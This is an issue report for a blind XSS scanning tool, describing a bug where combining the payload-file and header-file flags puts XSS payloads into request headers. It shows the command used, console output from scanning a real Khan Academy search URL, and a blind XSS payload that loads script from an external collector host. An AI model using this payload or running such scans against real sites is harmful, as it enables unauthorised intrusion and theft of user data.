
Conflict Between -pf and -hf Flags

Open bytes-Knight opened this issue 3 months ago • 0 comments

└─$ cat x1.txt | BXSS -pf ~/file/tools/loxs/payloads/bxss.txt -hf ~/hf.txt -l -c 3 -a -f



    v0.0.3

[NOTICE] Please Be Patient for bxss
[NOTICE] Checking URL Scheme: https://www.khanacademy.org/search?page_search_query=Gxss&referer=%2F

================================================================================

[INFO] Using Header: '">
[INFO] Using Trace Mode
[INFO] New Payload:'">

[NOTICE] Method: GET
[NOTICE] https://www.khanacademy.org/search?page_search_query=Gxss&referer=%2F
[ERROR] Error making request: Invalid header name (-32602)
[NOTICE] Method: POST
[NOTICE] https://www.khanacademy.org/search?page_search_query=Gxss&referer=%2F
[ERROR] Error making request: Invalid header name (-32602)
[NOTICE] Method: OPTIONS
[NOTICE] https://www.khanacademy.org/search?page_search_query=Gxss&referer=%2F
[ERROR] Error making request: Invalid header name (-32602)
[NOTICE] Method: PUT
[NOTICE] https://www.khanacademy.org/search?page_search_query=Gxss&referer=%2F

This tool breaks when I use both -pf and -hf flags together. Instead of taking headers from a different file, it replaces the blind XSS payloads in the headers.

[INFO] Using Header: '"><script src=https://xss.report/c/X></script>

bytes-Knight • Sep 10 '25 19:09